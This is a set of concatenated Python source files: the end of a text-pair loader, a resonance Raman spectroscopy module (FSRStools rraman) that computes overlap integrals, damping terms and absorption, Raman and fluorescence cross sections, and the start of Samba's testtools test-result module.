            msg = 'Missing both entailment and similarity values for pair {}'.format(id_)
            raise ValueError(msg)

        pair = Pair(t, h, id_, ent_value, similarity)
        pairs.append(pair)

    return pairs
ddietze/FSRStools
rraman/__init__.py
""" .. module: FSRStools.rraman :platform: Windows .. moduleauthor:: Daniel Dietze <daniel.dietze@berkeley.edu> Resonance Raman excitation profile calculation based on the time-domain picture of resonance Raman. See Myers and Mathies in *Biological Applications of Raman Spectroscopy*, Vol. 2, pp. 1-58 (John Wiley and Sons, New York, 1987) for details (referred to as Myers in the following). The code is mainly based on Myers' Fortran 77 code (see Appendix of PhD Thesis of K. M. Spillane, 2011, UC Berkeley for source code). **Changelog:** *10-7-2015:* - Added / modified functions for calculating fluorescence spectra. - Added a convenience function to calculate Raman spectra from a set of excitation profiles. - Added some more damping functions and phenomenological support for Stokes shift in simple homogeneous damping function. *10-21-2015:* - Some bug fixes concerning the prefactors and the normalization of the fluorescence spectra. - Fixed a bug regarding the Raman overlaps. **Example Code** Here is a short example calculating Myers' *Gedankenmolecule* from Myers and Mathies:: import numpy as np import FSRStools.rraman as rr # parameters: # ----------- # displacements D = np.array([1.27, 0.3, 0.7, 0.53]) # ground state frequencies RMg = np.array([1550.0, 1300.0, 1150.0, 1000.0]) # excited state frequencies RMe = np.array([1550.0, 1300.0, 1150.0, 1000.0]) # electronic zero-zero energy E0 = 20700.0 # homogeneous linewidth and shape parameter Gamma = 200.0 halpha = 0 # inhomogeneous linewidth and shape parameter sig = 400.0 ialpha = 1 # electronic transition dipole length M = 0.8 # index of refraction of surrounding medium IOR = 1.0 # time axis parameters for integrations tmax = 5000 dt = 0.2 # just calculate fundamentals nquanta = np.identity(len(RMg)) sshift = np.dot(nquanta, RMg) # calculation part # ---------------- # create axes t, wn = rr.getAxes(tmax, dt) # zero-zero energy and damping # add here all time domain stuff TDpart = rr.getHomogeneousDamping(t, Gamma, 
halpha) # time dependent overlap integrals OVLPS = rr.getOverlaps(t, D, RMg, RMe, nquanta) # calculate cross-sections sigmaA, sigmaR, kF = rr.getCrossSections(t, wn, E0, OVLPS, sshift, M, IOR, TDpart, sig, ialpha) .. This file is part of the FSRStools python module. The FSRStools python module is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. The FSRStools python module is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with the FSRStools python module. If not, see <http://www.gnu.org/licenses/>. Copyright 2014, 2015 Daniel Dietze <daniel.dietze@berkeley.edu>. """ import numpy as np # some constants hbar = 5308.880986 #: Planck's constant over 2 pi, hbar, in `cm-1 fs` c0 = 2.99792458e-5 #: speed of light in `cm / fs` kB = 0.695 #: Boltzman's constant in `cm-1 / K` # ------------------------------------------------------------------------------------------------------------------- # some useful functions def radperfs2wn(w): """Angular frequency (rad / fs) to wavenumber (cm-1). """ return hbar * w def wn2radperfs(e): """Wavenumber (cm-1) to angular frequency (rad / fs). """ return e / hbar def wn2lambda(w): """Convert wavenumber (cm-1) to wavelength (nm). """ return 1e7 / w def lambda2wn(w): """Convert wavelength (nm) to wavenumber (cm-1). """ return 1e7 / w def getWnIndex(wn, wn0): """Get the index into an array of wavenumbers wn with wavenumber closest to wn0. Use this function for :py:func:`getRamanSpectrum`. """ if np.amin(wn) > wn0 or np.amax(wn) < wn0: print "Warning: wn0 lies outside of wn." 
return np.argmin(np.absolute(wn - wn0)) def getAxes(tmax, dt): """Create time and frequency axes for the resonance Raman calculations. :param float tmax: Endpoint for time domain calculation (fs). This value should be high enough to capture the full dephasing. :param float dt: Increment of time axis (fs). This value should be small enough to capture the highest vibronic feature in the excited state. :returns: Time axis (fs) and frequency axis (cm-1). """ t = np.arange(0, tmax + dt, dt) numPoints = len(t) wn = np.arange(numPoints) / (c0 * dt * numPoints) return t, wn def molarExtinction2AbsCS(eSpctr, IOR): """Convert molar extinction (cm-1 / M) to molecular absorption cross section (A**2 / molec). See McHale, Resonance Raman Spectroscopy, Wiley, (2002), p. 545 or Myers & Mathies for details. The absorption cross section in solution has to be scaled by index of refraction unless the molar extinction has not been corrected. :param array eSpctr: Extinction spectrum in (cm-1 / M). :param float IOR: Index of refraction of surrounding solvent / medium. :returns: Absorption spectrum in units of (A**2 / molec.), same shape as eSpcrt. """ return 1e3 * np.log(10.0) * eSpctr / 6.0221e23 * 1e8 * 1e8 / IOR def diff2absRamanCS(diffRaCS, rho): """Convert the differential Raman cross section (A**2/molec sr) to absolute Raman cross section in (A**2 / molec) for a given depolarization ratio rho. :param float diffRaCS: Differential Raman cross section (A**2/molec sr). :param float rho: Associated depolarization ratio of this Raman mode. :returns: Absolute Raman cross section in (A**2 / molec). """ return 8.0 * np.pi / 3.0 * (1.0 + 2.0 * rho) / (1.0 + rho) * diffRaCS def getRamanSpectrum(wn, iEL, RMg, nquanta, sigmaR, dw=10.0, alpha=0): """ Convenience function to calculate the Raman spectrum. The spectrum is scattered power per infinitesimal frequency normalized to incident power times molecular density (cm-3) times path length (cm). See Myers, *Chem. Phys.* **180**, 215 (1994), Eq. 
7 for details. :param array wn: Wavenumber axis (Stokes shift, not electronic). :param int iEL: Index into sigmaR corresponding to the pump energy of the laser. :param array RMg: Ground state Raman frequencies :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0, 1, 2. :param array sigmaR: Array of M Raman cross sections that have been calculated by :py:func:`getCrossSections` (in A**2 / molec). :param float dw: Phenomenological FWHM linewidth of the Raman lines in cm-1 (default = 10 cm-1). :param float alpha: Line shape parameter to be used for the Raman spectrum: - 1 = Gaussian - 0 = Lorentzian (default) :returns: Calculated Raman spectrum (same shape as wn). """ spectrum = np.zeros(len(wn)) if iEL < 0 or iEL >= len(sigmaR[0]): print "Error: iEL is out of range!" return spectrum # iterate over all M modes for i, nM in enumerate(nquanta): # get frequency of this mode wR = np.sum(nM * RMg) # add Lorentzian part of lineshape spectrum = spectrum + (1.0 - alpha) * sigmaR[i][iEL] * 1e-16 * (dw / (2.0 * np.pi * ((wn - wR)**2 + dw**2 / 4.0))) # add Gaussian part of lineshape spectrum = spectrum + alpha * sigmaR[i][iEL] * 1e-16 * ((2.0 * np.sqrt(np.log(2) / np.pi)) / dw * np.exp(-4.0 * np.log(2.0) * (wn - wR)**2 / dw**2)) return spectrum # ----------------------------------------------------------------------------------------------------------------------------------- # time dependent overlap integrals with equal ground and excited state vibrational frequencies # the t00 overlap does not contain the factors exp(-1j wVIB t) nor exp(-1j E0/hbar t) as these are taken care of when assembling the cross section # Myers eqs. 
(37) - (39) # Delta = displacement in dimensionless coordinates # eVIB = vibrational frequency (cm-1) # t = time axis in fs def t00A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ # The 0-0 overlap does not contain the factors :math:`e^{-j w_{VIB} t}` nor :math:`e^{-j E_0 / \\hbar t}` as these are taken care of when assembling the cross section. return np.exp(-Delta**2 / 2.0 * (1.0 - np.exp(-1j * eVIB / hbar * t))) def t10A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ return Delta / np.sqrt(2) * (np.exp(-1j * eVIB / hbar * t) - 1.0) # * t00A(t, Delta, eVIB) def t20A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). 
:returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ return Delta**2 / (2 * np.sqrt(2)) * (np.exp(-1j * eVIB / hbar * t) - 1.0)**2 # * t00A(t, Delta, eVIB) # ------------------------------------------------------------------------------------------------------------------------------------------------- # same with different frequency in ground and excited state # Myers eqs. (42) - (44) # Delta = displacement in dimensionless coordinates # eg = ground state vibrational frequency (cm-1) # ee = excited state vibrational frequency (cm-1) # t = time axis in fs def t00B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). 
""" wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) # the log reduces to 0.5 * eg / hbar * t when eg = ee # this is the factor that is taken out in the t00A case, as it cancels with the exp in the integral later on # however, np.log returns values such that -pi < arg(log(..)) < pi gt = 1j / 2.0 * np.log(1j * wg / we * swe + cwe) + pt * (qt - Delta) / 2.0 # skip -E0 t / hbar # gt = gt + wg * t / 2.0 # add +w t / 2 using ground state frequency as this compensates the -w t / 2.0 term coming from the FFT # add the following term to recover t00A for eg = ee gt = gt - 1j / 2.0 * np.log(1j * np.sin(wg * t) + np.cos(wg * t)) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt gp = 1j * at * qt**2 - pt * qt + gt return a**(-0.5) * np.exp(-pp**2 / (4.0 * a)) * np.exp(1j * gp) def t10B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). 
""" wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt return 2**(-0.5) * pp / (1j * a) # * t00B(t, Delta, eg, ee) def t20B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). """ wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt return -8**(-0.5) * (pp**2 / a**2 + 2. * (1. - 1. / a)) # * t00B(t, Delta, eg, ee) # ---------------------------------------------------------------------------------------------------------------------------------- # same for linear dissociative excited state surfaces # Myers eqs. (52) - (54) # beta = slope of potential energy surface (dV / dq) in cm-1 (q is dimensionless coordinate) # eVIB = vibrational frequency (cm-1) def t00D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). 
:param float eVIB: Vibrational frequency (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). """ tmp = (1.0 + 1j * eVIB / hbar * t / 2.0)**(-0.5) * np.exp(-beta**2 * (6 * t**2 + 1j * eVIB / hbar * t**3) / (24 * hbar**2)) tmp = tmp * np.exp(1j * eVIB / hbar * t / 2.0) # add this term to compensate for the -1j w t / 2 term coming from the FFt return tmp def t10D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). :param float eVIB: Vibrational frequency (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). """ return -1j * 2**(-0.5) * (beta * t / hbar) # * t00D(t, beta, eVIB) def t20D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). :param float eVIB: Vibrational frequency (cm-1). :returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). 
""" return -2**(-0.5) * (beta**2 * t**2 / (2.0 * hbar**2) - 1j * eVIB / hbar * t / (2.0 + 1j * eVIB / hbar * t)) # * t00D(t, beta, eVIB) # --------------------------------------------------------------------------------------------------------------------------------- def getOverlaps(t, D, RMg, RMe, nquanta): """Calculate the time dependent overlap integrals / Franck-Condon factors :math:`<i|i(t)>_k` and :math:`<f|i(t)>_k`. .. versionchanged:: 10-07-2015 Format of return value changed. :param array t: Time axis in (fs). :param array D: Array of N normalized displacements of excited state surfaces (deltas), or slope of linear dissociative excited state surface. :param array RMg: N Raman ground state frequencies (cm-1). :param array RMe: N Raman excited state frequencies (cm-1) or -1 if excited state surface is dissociative. :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0 (no excitation), 1 (fundamental), 2 (first overtone). :returns: M + 2 - dimensional array containing the Rayleigh, fluorescence and M Raman overlaps. 
""" ovlps = [] N = len(D) M = nquanta.shape[0] # Frank-Condon factors <i|i(t)>_k and <f|i(t)>_k FC0 = [] FC0p = [] FC1 = [] FC2 = [] for i in range(N): if(RMg[i] == RMe[i]): FC0.append(t00A(t, D[i], RMg[i])) FC0p.append(FC0[-1]) # fluorescence overlap is identical to absorption overlap when frequencies are equal FC1.append(t10A(t, D[i], RMg[i])) FC2.append(t20A(t, D[i], RMg[i])) elif(RMe[i] == -1): FC0.append(t00D(t, D[i], RMg[i])) FC0p.append(np.zeros(len(t))) # fluorescence is negligible from dissociative surface FC1.append(t10D(t, D[i], RMg[i])) FC2.append(t20D(t, D[i], RMg[i])) else: FC0.append(t00B(t, D[i], RMg[i], RMe[i])) FC0p.append(t00B(t, D[i], RMe[i], RMg[i])) # fluorescence overlap has excited state and ground state Raman frequencies switched FC1.append(t10B(t, D[i], RMg[i], RMe[i])) FC2.append(t20B(t, D[i], RMg[i], RMe[i])) # go to numpy array.. FC0 = np.array(FC0) FC0p = np.array(FC0p) FC1 = np.array(FC1) FC2 = np.array(FC2) # Rayleigh / absorption overlap oabs = 1.0 + 0.0 * 1j # reuse this term for the raman overlaps for i in range(N): oabs = oabs * FC0[i] ovlps.append(oabs) # fluorescence overlap o = 1.0 + 0.0 * 1j for i in range(N): o = o * FC0p[i] ovlps.append(o) # actual Raman overlaps for j in range(M): o = 1.0 * oabs # all raman modes are based on this product and additional terms given by the excited modes for i in range(N): if(nquanta[j][i] == 1): o = o * FC1[i] elif(nquanta[j][i] == 2): o = o * FC2[i] ovlps.append(o) return ovlps # --------------------------------------------------------------------------------------------------------------------------------- def getZeroZeroEnergy(t, E0): """Calculate the oscillation term in the time domain due to the electronic zero-zero energy E0. :param array t: Time axis (fs). :param float E0: Difference between excited and ground state vibrational ground state energies, *zero-zero energy* (cm-1). 
""" return np.exp(-1j * E0 / hbar * t) # ----------------------------------------------------------------------------------------------------------------------------- # Calculate the damping terms as function of time t. def getHomogeneousDamping(t, Gamma, alpha=0, lmbda=0): """Calculates the damping term arising from the homogeneous linewidth of the electronic transition. Offers phenomenological support for Stokes shift. .. note:: Added phenomenological Stokes shift to input parameters on 10-12-2015. See for example *New J Phys* **11**, 015001 (2009), Eqs. (1) and (2). :param array t: Time axis (fs). :param float Gamma: Decay rate according to :math:`1 / \\tau` in (cm-1), where :math:`tau` is exponential dephasing time. :param float alpha: Line shape parameter: - 1 = Gaussian - 0 = Lorentzian :param float lmbda: Phenomenological Stokes shift (cm-1) which is added as imaginary part to g(t). Compared to the Brownian oscillator models, lmbda **is** the observed Stokes shift. (default = 0) :returns: Damping term in the time domain, :math:`e^{-g(t) - i \lambda t / 2 \hbar}`. """ g = alpha * (Gamma**2 / hbar**2 * t**2) + (1 - alpha) * (Gamma / hbar * t) + 1j * lmbda / 2.0 * t / hbar return np.exp(-g) def getKuboDamping(t, Delta, Lambda): """Calculates the damping term using Kubo's *stochastic model*. This model describes the broadening, but does not yield solvent induced Stokes shifts. :param array t: Time axis (fs). :param float Delta: Magnitude of solvent energy gap fluctuations (cm-1). This parameter also controls the effective line shape: - Delta >> Lambda = Lorentzian - Delta << Lambda = Gaussian :param float Lambda: Effective frequency of solvent fluctuations (cm-1). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: Myers, *J. Raman. 
Spectrosc.* **28**, 389 (1997) """ return np.exp(-(Delta / Lambda)**2 * (np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0)) def getBrownianDamping(t, kappa, T, egamma, cutoff=1e-6): """Calculate the damping term using Mukamel's Brownian oscillator model based on Myers Fortran code. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis (fs). :param float kappa: Lineshape parameter: - kappa >> 1 = Lorentzian, - kappa << 1 = Gaussian. :param float T: Temperature in K. :param float egamma: Electronic homogeneous linewidth (**FWHM**, cm-1). :param float cutoff: Cutoff for sum over Brownian oscillators. Typically between 1e-6 (default) and 1e-8. Check for convergence by re-running with different values. :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997) """ temp = np.absolute(T) # ---------------------------------------------------------- # 1: derive Mukamel's parameters from kappa, temp and egamma # I do not have a reference for this part - it's taken from Myers fortran code # Boltzmann beta beta = 1.0 / (kB * temp) # 1/cm-1 # some 'a' parameter (this comes from Myers Fortran program) a = (2.355 + 1.76 * kappa) / (1.0 + 0.85 * kappa + 0.88 * kappa**2) # these are Mukamel's parameters in Myers, J. Raman. Spec. 28, 389 (1997), eqs. 
(35) to (38) Lambda = kappa * egamma / a # cm-1 lmbda = beta * (Lambda / kappa)**2 / 2.0 # cm-1 # ---------------------------------------------------------- # 2: calculate the sum over n Brownian oscillators vs = np.zeros(len(t)) # this is the sum over the n oscillators as function of time in (cm-1)**-3 n = 0 while(True): n = n + 1 vn = 2.0 * np.pi * n / beta # cm-1 vinc = (np.exp(-vn / hbar * t) + vn / hbar * t - 1) / (vn * (vn**2 - Lambda**2)) vs = vs + vinc if(np.amax(np.absolute(vinc[1:] / vs[1:])) < cutoff): # the first element of vs is always 0 break # ---------------------------------------------------------- # 3: calculate the damping function g(t) gexp = np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0 # dimensionless greal = (lmbda / Lambda) / np.tan(beta * Lambda / 2.0) * gexp # dimensionless greal = greal + 4.0 * lmbda * Lambda / beta * vs # dimensionless gimag = -(lmbda / Lambda) * gexp # dimensionless g = greal + 1j * gimag # dimensionless return np.exp(-g) def getBrownianDamping2(t, lmbda, Lambda, T=298.0, cutoff=1e-6): """Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis in fs. :param float lmbda: Solvent contribution to reorganization energy (cm-1). :param float Lambda: Inverse of characteristic time scale for solvent fluctuations (fs-1). :param float T: Temperature (K, default = 298 K). :param float cutoff: Cutoff value for summation over brownian oscillators (default 1e-6). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eqs. (10a) to (10d). 
""" beta = 1.0 / (kB * np.absolute(T)) lmb = lmbda / hbar # convert to fs-1 # calculate real part as sum over oscillators gR = 0.0 i = 1.0 while(1): nun = 2.0 * np.pi / (hbar * beta) * i # frequency of ith oscillator dg = (np.exp(-nun * t) + nun * t - 1.0) / (nun * (nun**2 - Lambda**2)) gR = gR + dg i = i + 1.0 if np.sum(np.absolute(np.dg)) / np.sum(np.absolute(gR)) < cutoff: break gR = gR * 4.0 * lmb * Lambda / (hbar * beta) gR = gR + (lmb / Lambda) * np.cot(hbar * beta * Lambda / 2.0) * (np.exp(-Lambda * t) + Lambda * t - 1.0) # calculate imaginary part = Stokes shift gI = -(lmb / Lambda) * (np.exp(-Lambda * t) - 1.0) # assemble g = gR + 1j * gI # dimensionless return np.exp(-g) def getBrownianDampingSlowMod(t, lmbda, T=298.0): """Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model in the high-temperature and slow-modulation limit. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis in fs. :param float lmbda: Solvent contribution to reorganization energy (cm-1). :param float T: Temperature (K, default = 298 K). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eq. (11). """ lmb = lmbda / hbar # convert to fs-1 return np.exp(-(lmb * kB * np.absolute(T) * t**2 / hbar + 1j * lmb * t)) # --------------------------------------------------------------------------------------------------------------------------------- # def applyInhomogeneousBroadening(wn, y, sig, alpha=1): """Convolute a spectrum with a Gaussian/Lorentzian to account for inhomogeneous broadening. :param array wn: Frequency axis in same units as sig (cm-1). :param array y: Input spectrum, same shape as wn. :param float sig: Width of convolution function in same units as x (standard deviation of Gaussian distribution). 
Must not be zero. :param float alpha: Lineshape parameter: - 1 = Gaussian, - 0 = Lorentzian. :returns: Convoluted spectrum (same shape as y). """ ck = alpha / (sig * np.sqrt(2 * np.pi)) * np.exp(-(wn - (wn[-1] + wn[0]) / 2.0)**2 / (2.0 * sig**2)) ck += (1 - alpha) * sig / (np.pi * ((wn - (wn[-1] + wn[0]) / 2)**2 + sig**2)) # np.convolve uses a sum, whereas the function we want uses an integral; wn[1] - wn[0] is dwn return (wn[1] - wn[0]) * np.convolve(y, ck, 'same') # -------------------------------------------------------------------------------------------------------------------------------- def prefA(eEL, M, IOR, dt): """Return the prefactor for the absorption cross section calculation in (A**2 / molec). :param array eEL: Laser excitation energy in (cm-1). May also be a single float value. :param float M: Electronic transition dipole length in (A). :param float IOR: Index of refraction of surrounding solvent / medium. :param float dt: Time increment used for integration (fs). :returns: Prefactor for absorption cross section calculation. .. seealso:: Myers, Eq. (35). """ # to convert from esu to SI divide by 4 pi eps0 # the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft # so rfft is not completely identical to half-sided FT integral return 5.7579e-6 * M**2 * eEL * dt / IOR / 2.0 # ------------------------------------------------------------------------------------------------------------------------------- def prefR(eEL, M, eR, dt): """Return the prefactor for the Raman excitation profile calculation (A**2 / molec). :param array eEL: Laser excitation energies in (cm-1). Can also be a single floating point value. :param float M: Electronic transition dipole moment in (A). :param float eR: Stokes shift of the Raman line in (cm-1). :param float dt: Time increment for the integration (fs). :returns: The prefactor for the Raman excitation profile calculation. .. seealso:: Myers, Eq. (34) and following text. 
""" # get energy of stokes shifted photons eES = eEL - eR # the 1e-6 is for fs instead of ps in the integral and is consistent with Myers fortran code (it is different however from the 1e4 factor in Valley & Hoffman code!!) # to convert from esu to SI divide by (4 pi eps0)**2 return 2.0831e-20 * 1e-6 * M**4 * eES**3 * eEL * dt**2 # -------------------------------------------------------------------------------------------------------------------------------- def prefF(eEF, M, IOR, dt): """Return the prefactor for the fluorescence efficiency calculation (unitless). See :py:func:`getCrossSections` for more details. :param array eEF: Fluorescence energy in (cm-1). May also be a single float value. :param float M: Electronic transition dipole length in (A). :param float IOR: Index of refraction of surrounding solvent / medium. :param float dt: Time increment used for integration (fs). :returns: Prefactor for fluorescence efficiency calculation. .. seealso:: Myers, *Chem. Phys.* **180**, 215 (1994), Eqs. (6) and (26). """ # to convert from esu to SI divide by 4 pi eps0 # the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft # so rfft is not completely identical to half-sided FT integral return 3.6656e-22 * IOR * M**2 * eEF**3 * dt / 2.0 # ---------------------------------------------------------------------------------------------------------------------------- def getCrossSections(t, wn, E0, ovlps, sshift, M, IOR, damp=1, sig=0, ialpha=1): """Calculate the absorption and Raman cross-sections and the fluorescence efficiency. The latter is a unitless quantity which may be used to calculate the fluorescence rate (=rate of spontaneous emission) by integrating over the frequency axis (see Myers, *Chem. Phys.* **180**, 215 (1994) Eq. 6 and discussion). .. note:: Changed shape of input parameters and shape of return values on 10-07-2015. :param array t: Time axis in (fs). 
This axis is used for the calculation of the zero-zero energy term in the time domain. :param array wn: Wavenumber axis in (cm-1). Same shape as t. :param array E0: Zero-zero energy. This function then calculates the time domain part using `getZeroZeroEnergy`. :param array ovlps: M + 2 Absorption, fluorescence and Raman overlap integrals. :param float sshift: Vibrational freqencies of M Raman modes to calculate (cm-1). :param float M: Electronic transition dipole length (A). :param float IOR: Index of refraction of surrounding medium / solvent. :param array damp: Damping function in the time domain. Same shape as t. Set to 1 if no damping is used (default). :param float sig: Linewidth for inhomogeneous damping (standard deviation of Gaussian), set to zero if not used (default). :param float ialpha: Lineshape parameter for inhomogeneous damping: - 1 = Gaussian (default), - 0 = Lorentzian. :returns: Absorption (sigmaA), M Raman cross sections (sigmaR[M]), both in A**2 / mol., and fluorescence efficiency spectrum, kF (arrays have same shape as wn); all as function of excitation wavenumber. 
""" Npoints = len(wn) dt = t[1] - t[0] # caluclate zero-zero time domain part tdpart = getZeroZeroEnergy(t, E0) # absorption cross section - using the half sided FT (equivalent to rfft) tmp = np.real(Npoints * np.fft.irfft(ovlps[0] * tdpart * damp, Npoints)) if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) sigmaA = prefA(wn, M, IOR, dt) * tmp # fluorescence rate / intensity - using half sided FT - similar to absorption # in order to account for the sign change, the zero-zero energy time domain part and the damping term had to be separated; # use the tdpart conjugated and change irfft by hfft to get the factor exp(-1j w t) # numpy does not normalize the forward FFT, so no factor Npoints tmp = np.real(np.fft.hfft(ovlps[1] * np.conjugate(tdpart) * damp, Npoints)) if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) kF = prefF(wn, M, IOR, dt) * tmp # Raman cross sections - using a standard FT sigmaR = [] for i, ovlp in enumerate(ovlps[2:]): # iterate over all lines tmp = np.absolute(Npoints * np.fft.ifft(ovlp * tdpart * damp, Npoints))**2 # use again the inverse transform to get "exp(1j w t)" if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) sigmaR.append(prefR(wn, M, sshift[i], dt) * tmp) return sigmaA, sigmaR, kF
lauria/Samba4
lib/testtools/testtools/testresult/real.py
# Copyright (c) 2008 testtools developers. See LICENSE for details. """Test results and related things.""" __metaclass__ = type __all__ = [ 'ExtendedToOriginalDecorator', 'MultiTestResult', 'TestResult', 'ThreadsafeForwardingResult', ] import datetime import sys import unittest from testtools.compat import all, _format_exc_info, str_is_unicode, _u # From http://docs.python.org/library/datetime.html _ZERO = datetime.timedelta(0) # A UTC class. class UTC(datetime.tzinfo): """UTC""" def utcoffset(self, dt): return _ZERO def tzname(self, dt): return "UTC" def dst(self, dt): return _ZERO utc = UTC() class TestResult(unittest.TestResult): """Subclass of unittest.TestResult extending the protocol for flexability. This test result supports an experimental protocol for providing additional data to in test outcomes. All the outcome methods take an optional dict 'details'. If supplied any other detail parameters like 'err' or 'reason' should not be provided. The details dict is a mapping from names to MIME content objects (see testtools.content). This permits attaching tracebacks, log files, or even large objects like databases that were part of the test fixture. Until this API is accepted into upstream Python it is considered experimental: it may be replaced at any point by a newer version more in line with upstream Python. Compatibility would be aimed for in this case, but may not be possible. :ivar skip_reasons: A dict of skip-reasons -> list of tests. See addSkip. """ def __init__(self): # startTestRun resets all attributes, and older clients don't know to # call startTestRun, so it is called once here. # Because subclasses may reasonably not expect this, we call the # specific version we want to run. TestResult.startTestRun(self) def addExpectedFailure(self, test, err=None, details=None): """Called when a test has failed in an expected manner. Like with addSuccess and addError, testStopped should still be called. :param test: The test that has been skipped. 
